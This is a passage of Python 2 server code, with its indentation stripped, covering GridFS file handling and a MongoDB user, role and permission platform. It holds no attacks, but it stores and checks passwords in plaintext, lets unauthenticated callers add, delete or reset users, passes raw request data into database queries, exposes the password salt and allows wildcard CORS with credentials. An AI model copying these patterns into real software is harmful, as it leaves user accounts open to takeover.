db_util.mongo_init_client(app)
dbname = gConfig[app]['mongodb']['database']
db = db_util.gClientMongo[app][dbname]
fs = gridfs.GridFS(db, collection=collection)
_id = db_util.add_mongo_id(querydict['_id'])
try:
f = fs.get(_id)
headers['Content-Type'] = str(f.content_type)
if querydict.has_key('width') and querydict.has_key('height') \
and querydict['width']>0 and querydict['width']<8192 \
and querydict['height']>0 and querydict['height']<8192 :
if 'image/' in f.content_type:
body = thumbnail(f, (querydict['width'], querydict['height']), False)
else:
body = thumbnail(f, (128, 128), False)
headers['Content-Type'] = 'image/png'
if body is None:
body = json.dumps({'result': u'gridfs_get_error_invalid_image_format'}, ensure_ascii=True, indent=4)
else:
body = f.read()
if querydict.has_key('attachmentdownload'):
headers['Content-Disposition'] = 'attachment;filename="' + enc(f.filename) + '"'
except gridfs.errors.NoFile:
body = json.dumps({'result': u'gridfs_get_file_not_exist'}, ensure_ascii=True, indent=4)
except Exception,e:
headers['Content-Type'] = 'text/json;charset=' + ENCODING
body = json.dumps({'result': u'gridfs_get_error:%s' % e.message}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result': u'gridfs_get_cannot_find_wsgi_app [%s]' % app}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def gridfs_delete(environ, querydict):
global gConfig, ENCODING
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
body = ''
statuscode = '200 OK'
if querydict.has_key('_'):
del querydict['_']
if querydict.has_key('_random'):
del querydict['_random']
if not querydict.has_key('_id'):
body = json.dumps({'result': u'gridfs_delete_id_required'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
app = gConfig['wsgi']['application']
if gConfig.has_key(app):
collection = 'fs'
if gConfig[app].has_key('mongodb') and gConfig[app]['mongodb'].has_key('gridfs_collection'):
collection = str(gConfig[app]['mongodb']['gridfs_collection'])
if len(collection) == 0:
collection = 'fs'
db_util.mongo_init_client(app)
dbname = gConfig[app]['mongodb']['database']
db = db_util.gClientMongo[app][dbname]
fs = gridfs.GridFS(db, collection=collection)
arr = querydict['_id'].split(',')
ids = []
for i in arr:
ids.append(db_util.add_mongo_id(i))
try:
for i in ids:
fs.delete(i)
body = json.dumps(querydict, ensure_ascii=True, indent=4)
except Exception,e:
body = json.dumps({'result': u'gridfs_delete_error:%s' % e.message}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result': u'gridfs_delete_cannot_find_wsgi_app [%s]' % app}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def gridfs_query(environ, querydict):
global gConfig, ENCODING, STATICRESOURCE_DIR
def thumbnail(fp, size, use_base64=False):
ret = None
if 'image/' in fp.mimetype:
im = Image.open(fp)
im.thumbnail(size)
buf = StringIO.StringIO()
#print(im.format)
im.save(buf, im.format)
ret = buf.getvalue()
if use_base64:
ret = base64.b64encode(ret)
if 'application/' in fp.mimetype or 'text/' in fp.mimetype:
thumpath = gConfig['web']['thumbnail']['application/octet-stream']
if gConfig['web']['thumbnail'].has_key(fp.mimetype):
thumpath = gConfig['web']['thumbnail'][fp.mimetype]
thumpath = os.path.join(STATICRESOURCE_DIR, 'img', 'thumbnail', thumpath)
im = Image.open(thumpath)
im.thumbnail(size)
buf = StringIO.StringIO()
im.save(buf, im.format)
ret = buf.getvalue()
if use_base64:
ret = base64.b64encode(ret)
return ret
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
body = '[]'
statuscode = '200 OK'
app = gConfig['wsgi']['application']
if querydict.has_key('_'):
del querydict['_']
if querydict.has_key('_random'):
del querydict['_random']
if gConfig.has_key(app):
collection = 'fs'
if gConfig[app].has_key('mongodb') and gConfig[app]['mongodb'].has_key('gridfs_collection'):
collection = str(gConfig[app]['mongodb']['gridfs_collection'])
if len(collection) == 0:
collection = 'fs'
db_util.mongo_init_client(app)
dbname = gConfig[app]['mongodb']['database']
db = db_util.gClientMongo[app][dbname]
fs = gridfs.GridFS(db, collection=collection)
limit = 10
skip = 0
if querydict.has_key('limit'):
limit = querydict['limit']
del querydict['limit']
if querydict.has_key('skip'):
skip = querydict['skip']
del querydict['skip']
try:
if querydict.has_key('width') and querydict.has_key('height') \
and querydict['width']>0 and querydict['width']<8192 \
and querydict['height']>0 and querydict['height']<8192 :
w, h = querydict['width'], querydict['height']
del querydict['width']
del querydict['height']
cur = None
if querydict.has_key('_id'):
ids = db_util.add_mongo_id(querydict['_id'])
cur = fs.find({'_id':{'$in':ids}}).limit(limit).skip(skip)
else:
cur = fs.find(db_util.add_mongo_id(querydict)).limit(limit).skip(skip)
arr = []
for f in cur:
b64str = thumbnail(f, (w, h), True)
if 'application/' in f.content_type:
f.mimetype = 'image/png'
arr.append({'_id':db_util.remove_mongo_id(f._id), 'mimetype':f.mimetype,'filename':enc(f.filename), 'data': b64str})
body = json.dumps(arr, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result': u'gridfs_query_size_required'}, ensure_ascii=True, indent=4)
except gridfs.errors.NoFile:
body = json.dumps({'result': u'gridfs_query_file_not_exist'}, ensure_ascii=True, indent=4)
except Exception,e:
body = json.dumps({'result': u'gridfs_query_error:%s' % e.message}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result': u'gridfs_query_cannot_find_wsgi_app [%s]' % app}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def gridfs_upload(environ, querydict, buf):
global gConfig
app = gConfig['wsgi']['application']
body = ''
if gConfig.has_key(app):
collection = 'fs'
if gConfig[app].has_key('mongodb') and gConfig[app]['mongodb'].has_key('gridfs_collection'):
collection = str(gConfig[app]['mongodb']['gridfs_collection'])
if len(collection) == 0:
collection = 'fs'
db_util.mongo_init_client(app)
dbname = gConfig[app]['mongodb']['database']
db = db_util.gClientMongo[app][dbname]
if querydict.has_key('file_id'):
del querydict['file_id']
fs = gridfs.GridFS(db, collection=collection)
_id = None
try:
querydict = db_util.add_mongo_id(querydict);
if querydict.has_key('_uniqueIndex'):
uniqueIndex = querydict['_uniqueIndex']
cond = {}
if (isinstance(uniqueIndex, unicode) or isinstance(uniqueIndex, str)) and len(uniqueIndex)>0:
arr = uniqueIndex.split(',')
for indexName in arr:
indexName = indexName.strip()
if querydict.has_key(indexName):
cond[indexName] = querydict[indexName]
if len(cond.keys())>1:
idlist = []
cur = fs.find(cond)
for i in cur:
idlist.append(i._id)
for i in idlist:
fs.delete(i)
del querydict['_uniqueIndex']
_id = fs.put(buf, **querydict)
except gridfs.errors.FileExists:
if querydict.has_key('_id'):
_id = db_util.add_mongo_id(querydict['_id'])
fs.delete(_id)
_id = fs.put(buf, **querydict)
except:
raise
body = json.dumps({'_id':db_util.remove_mongo_id(_id)}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':u'cannot find wsgi app [%s]' % app}, ensure_ascii=True, indent=4)
return body
def handle_authorize_platform(environ, session):
global ENCODING
global gConfig, gRequest, gSessionStore, gUrlMap, gSecurityConfig, gWebSocketsMap, gJoinableQueue
def get_collection(collection):
ret = None
db_util.mongo_init_client('authorize_platform')
db = db_util.gClientMongo['authorize_platform'][gConfig['authorize_platform']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
def get_all_functions():
ret = []
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_functions'])
ret = list(collection.find({}))
#for i in cur:
#ret.append(i)
return ret
def get_all_roles(exclude_template=False):
ret = []
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_roles'])
if exclude_template:
ret = list(collection.find({'name':{'$not':re.compile("template")}}))
else:
ret = list(collection.find({}))
#for i in cur:
#ret.append(i)
return ret
def check_role_can_be_delete(_id):
def get_id_list(node):
reet = []
if node.has_key('roles'):
for i in node['roles']:
reet.append(i)
return reet
ret = True
for i in get_user():
idlist = get_id_list(i)
if _id in idlist:
ret = False
break
return ret
def check_function_can_be_delete(_id):
def get_id_list(node):
reet = []
if node.has_key('_id'):
reet.append(node['_id'])
if node.has_key('children'):
for i in node['children']:
reet.extend(get_id_list(i))
return reet
ret = True
for i in get_all_roles():
idlist = get_id_list(i)
if _id in idlist:
ret = False
break
return ret
def check_valid_user(session, user=None):
ret = False
if session and session.has_key('username') and len(session['username'])>0:
if user:
ret = session['username'] == user
else:
ret = True
return ret
def function_add(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_functions'])
if querydict.has_key('name'):
existone = collection.find_one({'name':querydict['name']})
if existone:
ret = json.dumps({'result':u'function_add_fail_name_exist'}, ensure_ascii=True, indent=4)
else:
_id = collection.save(db_util.add_mongo_id(querydict))
rec = collection.find_one({'_id':_id})
ret = db_util.remove_mongo_id(rec)
ret = json.dumps(ret, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'function_add_fail_name_required'}, ensure_ascii=True, indent=4)
return ret
def function_query(session, querydict):
#if not check_valid_user(session, 'admin'):
#return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
l = get_all_functions()
ret = json.dumps(db_util.remove_mongo_id(l), ensure_ascii=True, indent=4)
return ret
def function_update(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_functions'])
if querydict.has_key('_id'):
wr = collection.update({'_id':db_util.add_mongo_id(querydict['_id'])}, db_util.add_mongo_id(querydict), multi=False, upsert=False)
rec = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
ret = db_util.remove_mongo_id(rec)
ret = json.dumps(ret, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'function_update_fail_id_required'}, ensure_ascii=True, indent=4)
return ret
def function_delete(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_functions'])
if querydict.has_key('_id'):
existone = collection.find_one({'_id': db_util.add_mongo_id(querydict['_id'])})
if existone:
if check_function_can_be_delete(existone['_id']):
wr = collection.remove({'_id':db_util.add_mongo_id(existone['_id'])})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'function_delete_fail_need_deleted_in_role_first'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'function_delete_fail_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'function_delete_fail_id_required'}, ensure_ascii=True, indent=4)
return ret
def role_add(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_roles'])
if querydict.has_key('name'):
existone = collection.find_one({'name':querydict['name']})
if existone:
ret = json.dumps({'result':u'role_add_fail_name_already_exist'}, ensure_ascii=True, indent=4)
else:
_id = collection.save(db_util.add_mongo_id(querydict))
rec = collection.find_one({'_id':_id})
ret = db_util.remove_mongo_id(rec)
ret = json.dumps(ret, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'role_add_fail_name_required'}, ensure_ascii=True, indent=4)
return ret
def role_query(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
l = get_all_roles(True)
ret = json.dumps(db_util.remove_mongo_id(l), ensure_ascii=True, indent=4)
return ret
def role_update(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_roles'])
if querydict.has_key('_id'):
wr = collection.update({'_id':db_util.add_mongo_id(querydict['_id'])}, db_util.add_mongo_id(querydict), multi=False, upsert=False)
rec = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
ret = db_util.remove_mongo_id(rec)
ret = json.dumps(ret, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'role_update_fail_id_required'}, ensure_ascii=True, indent=4)
return ret
def role_delete(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_roles'])
if querydict.has_key('_id'):
existone = collection.find_one({'_id': db_util.add_mongo_id(querydict['_id'])})
if existone:
if check_role_can_be_delete(existone['_id']):
wr = collection.remove({'_id':db_util.add_mongo_id(existone['_id'])})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'role_delete_fail_need_delete_in_user_first'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'role_delete_fail_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'role_delete_fail_id_required'}, ensure_ascii=True, indent=4)
return ret
def role_template_get(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
l = get_all_roles()
for i in l:
if i['name'] == 'template':
ret = json.dumps(db_util.remove_mongo_id(i), ensure_ascii=True, indent=4)
break
if len(ret) == 0:
ret = json.dumps({}, ensure_ascii=True, indent=4)
return ret
def role_template_save(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_roles'])
if querydict.has_key('_id'):
wr = collection.update({'_id':db_util.add_mongo_id(querydict['_id'])}, db_util.add_mongo_id(querydict), multi=False, upsert=False)
rec = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
ret = db_util.remove_mongo_id(rec)
ret = json.dumps(ret, ensure_ascii=True, indent=4)
else:
#ret = json.dumps({'result':u'role_template_save_fail_id_required'}, ensure_ascii=True, indent=4)
_id = collection.save(db_util.add_mongo_id(querydict))
if _id:
querydict['_id'] = _id
ret = json.dumps(db_util.remove_mongo_id(querydict), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'role_template_save_fail'}, ensure_ascii=True, indent=4)
return ret
def get_user(user=None):
ret = []
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_user_account'])
if user:
ret = list(collection.find({'username':user}))
else:
ret = list(collection.find({}))
#for i in cur:
#ret.append(i)
return ret
def get_funclist_by_roles(roles):
def get_func_list(node):
ret = []
if node.has_key('_id'):
if node.has_key('checked') and node['checked'] is True:
ret.append(node['_id'])
if node.has_key('children'):
for i in node['children']:
ret.extend(get_func_list(i))
return ret
ret = []
rolelist = get_all_roles(True)
for node in rolelist:
if node.has_key('_id') and node['_id'] in roles:
ret.extend(get_func_list(node))
return ret
def check_user_has_function(session, querydict):
ret = ''
if not check_valid_user(session):
return json.dumps({'result':u'username_required'}, ensure_ascii=True, indent=4)
if querydict.has_key('username') :
if querydict.has_key('functions') :
if len(querydict['functions'])>0:
userlist = get_user(querydict['username'])
if len(userlist)>0:
if userlist[0].has_key('roles') and isinstance(userlist[0]['roles'], list) and len(userlist[0]['roles'])>0:
roles = userlist[0]['roles']
funclist = get_funclist_by_roles(roles)
retlist = []
for f in querydict['functions']:
o = {}
o['_id'] = f
if ObjectId(f) in funclist:
o['enable'] = True
else:
o['enable'] = False
retlist.append(o)
ret = json.dumps(retlist, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'this_user_has_no_role'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'username_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'function_id_list_required'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'functions_required'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'username_required'}, ensure_ascii=True, indent=4)
return ret
def user_query(session, querydict):
if not check_valid_user(session, 'admin'):
return json.dumps({'result':u'admin_permission_required'}, ensure_ascii=True, indent=4)
ret = ''
if querydict.has_key('username') and len(querydict['username'])>0:
l = get_user(querydict['username'])
if len(l)>0:
ret = json.dumps(db_util.remove_mongo_id(l[0]), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'username_not_found'}, ensure_ascii=True, indent=4)
else:
l = get_user()
ret = json.dumps(db_util.remove_mongo_id(l), ensure_ascii=True, indent=4)
return ret
def user_add(session, querydict):
ret = ''
if querydict.has_key('username') and querydict.has_key('password') and len(querydict['username'])>0 and len(querydict['password'])>0:
try:
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_user_account'])
existone = collection.find_one({'username':querydict['username']})
if existone:
ret = json.dumps({'result':u'register_fail_username_already_exist'}, ensure_ascii=True, indent=4)
else:
_id = collection.save(db_util.add_mongo_id(querydict))
rec = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(rec), ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'register_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'register_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'register_fail_username_password_required'}, ensure_ascii=True, indent=4)
return ret
def user_delete(session, querydict):
ret = ''
if querydict.has_key('username') and len(querydict['username'])>0:
try:
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_user_account'])
existone = collection.find_one({'username':querydict['username']})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'unregister_fail_not_exist' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'unregister_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'unregister_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'unregister_fail_username_required'}, ensure_ascii=True, indent=4)
return ret
def reset_password(session, querydict):
ret = ''
if querydict.has_key('username') and len(querydict['username'])>0 and querydict.has_key('password') and len(querydict['password'])>0:
try:
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_user_account'])
one = collection.find_one({'username':querydict['username']})
if one:
collection.update({'username':querydict['username']}, {'$set':{'password':querydict['password']}}, multi=False, upsert=False)
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'reset_password_fail_not_exist'}, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'reset_password_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'reset_password_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'reset_password_fail_username_password_required'}, ensure_ascii=True, indent=4)
return ret
def user_update(session, querydict):
ret = ''
if querydict.has_key('username') and len(querydict['username'])>0 :
try:
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_user_account'])
one = collection.find_one({'username':querydict['username']})
if one:
collection.update({'username':querydict['username']}, db_util.add_mongo_id(querydict), multi=False, upsert=False)
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_update_fail_not_exist'}, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'user_update_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_update_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_update_fail_username_required'}, ensure_ascii=True, indent=4)
return ret
def login(session, querydict):
ok = False
ret = ''
if querydict.has_key('username') and querydict.has_key('password') and len(querydict['username'])>0 and len(querydict['password'])>0:
try:
check, ip = session_check_user_ip(environ, querydict['username'])
if gSessionStore and not check:
ret = json.dumps({'result':u'other_ip_already_login:%s' % ip }, ensure_ascii=True, indent=4)
return ret, ok
if gSessionStore and session:
collection = get_collection(gConfig['authorize_platform']['mongodb']['collection_user_account'])
one = collection.find_one({'username':querydict['username'], 'password':querydict['password']})
if one:
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
ok = True
else:
ret = json.dumps({'result':u'login_fail_wrong_username_or_password' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'login_fail_session_expired' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'login_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'login_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'login_fail_username_password_required'}, ensure_ascii=True, indent=4)
return ret, ok
def auth_check(session, querydict, isnew):
ret = ''
if session :
if querydict.has_key('username') and len(querydict['username'])>0:
if isnew is True:
session['username'] = querydict['username']
gSessionStore.save(session)
ret = json.dumps({'result':u'auth_check_ok_session_saved'}, ensure_ascii=True, indent=4)
else:
if session.sid:
user = gSessionStore.get_data_by_username(session.sid, querydict['username'])
if user:
ret = json.dumps({'result':u'auth_check_ok_user_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'auth_check_fail_session_expired'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'auth_check_fail_session_expired'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'auth_check_fail_username_require'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'auth_check_fail_session_expired'}, ensure_ascii=True, indent=4)
return ret
def sub(uid, channel, websocket):
if uid and websocket and not websocket.closed:
if not gWebSocketsMap.has_key(uid + '|' + channel):
gWebSocketsMap[uid + '|' + channel] = websocket
def unsub(uid, channels):
keys = channels
while len(keys)>0:
key = keys[0]
if uid and gWebSocketsMap.has_key(uid + '|' + key):
del gWebSocketsMap[uid + '|' + key]
del keys[0]
def handle_websocket(environ):
ws = get_websocket(environ)
app = gConfig['wsgi']['application']
session_id = None
channel = ''
if environ.has_key('HTTP_COOKIE'):
arr = environ['HTTP_COOKIE'].split('=')
if len(arr)>1:
session_id = arr[1]
interval = 1.0
try:
interval = float(gConfig[app]['websocket']['interval_poll'])
except:
interval = 1.0
while ws and not ws.closed:
obj = ws_recv(environ)
if obj and isinstance(obj, dict) and obj.has_key('op'):
#print(obj)
if obj['op'] == 'session_list':
ws.send(ws_session_query())
elif obj['op'] == 'subscribe/session_list':
sub(session_id, 'session_list', ws)
elif obj['op'] == 'unsubscribe/session_list':
unsub(session_id, ['session_list',])
elif obj['op'] == 'session_remove':
if obj.has_key('id') and len(obj['id'])>0:
print('remove session from client:')
print(obj['id'])
gSessionStore.delete_by_id(obj['id'])
elif obj['op'] == 'queue_size':
qsize = 0
if gJoinableQueue:
qsize = gJoinableQueue.qsize()
ws.send(json.dumps({'queue_size':qsize}, ensure_ascii=True, indent=4))
else:
try:
ws.send('')
except:
for k in gWebSocketsMap.keys():
if gWebSocketsMap[k] is ws:
gWebSocketsMap[k].close()
del gWebSocketsMap[k]
break
gevent.sleep(interval)
if ws and ws.closed:
del ws
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
isnew = False
urls = gUrlMap.bind_to_environ(environ)
querydict, buf = get_querydict_by_GET_POST(environ)
endpoint = ''
try:
endpoint, args = urls.match()
if args.has_key('username'):
querydict['username'] = args['username']
if args.has_key('password'):
querydict['password'] = args['password']
if endpoint == 'auth_check':
body = auth_check(session, querydict, False)
elif endpoint == 'handle_websocket':
handle_websocket(environ)
elif endpoint == 'get_salt':
if len(gSecurityConfig.keys())>0:
body = json.dumps({'result':'get_salt_ok','salt':gSecurityConfig['password_salt']}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'get_salt_fail'}, ensure_ascii=True, indent=4)
elif endpoint == 'user_add':
body = user_add(session, querydict)
elif endpoint == 'user_check':
body = check_user_has_function(session, querydict)
elif endpoint == 'user_delete':
body = user_delete(session, querydict)
elif endpoint == 'user_query':
body = user_query(session, querydict)
elif endpoint == 'user_update':
body = user_update(session, querydict)
elif endpoint == 'reset_password':
body = reset_password(session, querydict)
elif endpoint == 'login':
body, loginok = login(session, querydict)
if loginok:
if querydict.has_key('username') and len(querydict['username'])>0:
session['username'] = querydict['username']
elif endpoint == 'logout':
if gSessionStore and session:
gSessionStore.delete(session)
session = None
body = json.dumps({'result':u'logout_ok'}, ensure_ascii=True, indent=4)
elif endpoint == 'function_add':
body = function_add(session, querydict)
elif endpoint == 'function_query':
body = function_query(session, querydict)
elif endpoint == 'function_update':
body = function_update(session, querydict)
elif endpoint == 'function_delete':
body = function_delete(session, querydict)
elif endpoint == 'role_add':
body = role_add(session, querydict)
elif endpoint == 'role_update':
body = role_update(session, querydict)
elif endpoint == 'role_query':
body = role_query(session, querydict)
elif endpoint == 'role_delete':
body = role_delete(session, querydict)
elif endpoint == 'role_template_save':
body = role_template_save(session, querydict)
elif endpoint == 'role_template_get':
body = role_template_get(session, querydict)
else:
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
except HTTPException, e:
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
if session:
gSessionStore.save(session)
return statuscode, headers, body
def CORS_header(h={}):
global gConfig
def default_header(h={}):
ret = {};
for k in h.keys():
ret[k] = h[k]
ret['Access-Control-Allow-Origin'] = '*'
ret['Access-Control-Allow-Credentials'] = 'true'
ret['Access-Control-Expose-Headers'] = 'true'
ret['Access-Control-Max-Age'] = '3600'
ret['Access-Control-Allow-Methods'] = 'POST,GET,OPTIONS'
return ret
headers = {}
for k in h.keys():
headers[k] = h[k]
if gConfig['web']['cors']['enable_cors'].lower() == 'true':
app = gConfig['wsgi']['application']
if gConfig.has_key(app) and gConfig[app].has_key('cors'):
try:
if gConfig[app]['cors'].has_key('Access-Control-Allow-Origin'):
headers['Access-Control-Allow-Origin'] = str(gConfig[app]['cors']['Access-Control-Allow-Origin'])
if gConfig[app]['cors'].has_key('Access-Control-Allow-Credentials'):
headers['Access-Control-Allow-Credentials'] = str(gConfig[app]['cors']['Access-Control-Allow-Credentials'])
if gConfig[app]['cors'].has_key('Access-Control-Expose-Headers'):
headers['Access-Control-Expose-Headers'] = str(gConfig[app]['cors']['Access-Control-Expose-Headers'])
if gConfig[app]['cors'].has_key('Access-Control-Max-Age'):
headers['Access-Control-Max-Age'] = str(gConfig[app]['cors']['Access-Control-Max-Age'])
if gConfig[app]['cors'].has_key('Access-Control-Allow-Methods'):
s = gConfig[app]['cors']['Access-Control-Allow-Methods']
if isinstance(s, list):
s = ','.join(s)
headers['Access-Control-Allow-Methods'] = str(s)
except:
headers = default_header(h)
else:
try:
if gConfig['web']['cors'].has_key('Access-Control-Allow-Origin'):
headers['Access-Control-Allow-Origin'] = str(gConfig['web']['cors']['Access-Control-Allow-Origin'])
if gConfig['web']['cors'].has_key('Access-Control-Allow-Credentials'):
headers['Access-Control-Allow-Credentials'] = str(gConfig['web']['cors']['Access-Control-Allow-Credentials'])
if gConfig['web']['cors'].has_key('Access-Control-Expose-Headers'):
headers['Access-Control-Expose-Headers'] = str(gConfig['web']['cors']['Access-Control-Expose-Headers'])
if gConfig['web']['cors'].has_key('Access-Control-Max-Age'):
headers['Access-Control-Max-Age'] = str(gConfig['web']['cors']['Access-Control-Max-Age'])
if gConfig['web']['cors'].has_key('Access-Control-Allow-Methods'):
s = gConfig['web']['cors']['Access-Control-Allow-Methods']
if isinstance(s, list):
s = ','.join(s)
headers['Access-Control-Allow-Methods'] = str(s)
except:
headers = default_header(h)
return headers
def check_is_static(aUrl):
global STATICRESOURCE_DIR
global gConfig
ret = False
surl = dec(aUrl)
if surl[0:2] == '//':
surl = surl[2:]
if surl[0] == '/':
surl = surl[1:]
p = os.path.join(STATICRESOURCE_DIR , surl)
isBin = False
ext = os.path.splitext(p)[1]
if '.' in surl:
ext = surl[surl.rindex('.'):]
else:
ext = os.path.splitext(p)[1]
if len(ext)>0 and gConfig['mime_type'].has_key(ext):
ret = True
return ret
def whitelist_check(environ, start_response):
global gConfig
ret = True
if gConfig['listen_port'].has_key('whitelist') and len(gConfig['listen_port']['whitelist'])>0:
if isinstance(gConfig['listen_port']['whitelist'], unicode):
s = str(gConfig['listen_port']['whitelist'])
rere = re.compile(s)
if environ.has_key('REMOTE_ADDR') and len(rere.findall(environ['REMOTE_ADDR']))==0:
ret = False
elif isinstance(gConfig['listen_port']['whitelist'], list):
cnt = 0
ret = False
for i in gConfig['listen_port']['whitelist']:
s = str(i)
rere = re.compile(s)
if environ.has_key('REMOTE_ADDR') and len(rere.findall(environ['REMOTE_ADDR']))>0:
cnt += 1
if cnt>0:
ret = True
return ret
def blacklist_check(environ, start_response):
global gConfig
ret = True
if gConfig['listen_port'].has_key('blacklist') and len(gConfig['listen_port']['blacklist'])>0:
if isinstance(gConfig['listen_port']['blacklist'], unicode):
s = str(gConfig['listen_port']['blacklist'])
rere = re.compile(s)
if environ.has_key('REMOTE_ADDR') and len(rere.findall(environ['REMOTE_ADDR']))>0:
ret = False
elif isinstance(gConfig['listen_port']['blacklist'], list):
cnt = 0
ret = True
for i in gConfig['listen_port']['blacklist']:
s = str(i)
rere = re.compile(s)
if environ.has_key('REMOTE_ADDR') and len(rere.findall(environ['REMOTE_ADDR']))>0:
cnt += 1
if cnt>0:
ret = False
return ret
def ip_check(environ, start_response):
ret = False
if whitelist_check(environ, start_response) and blacklist_check(environ, start_response):
ret = True
return ret
def session_check_user_ip(environ, username):
global gConfig, gSessionStore
ret = True
ip = environ['REMOTE_ADDR']
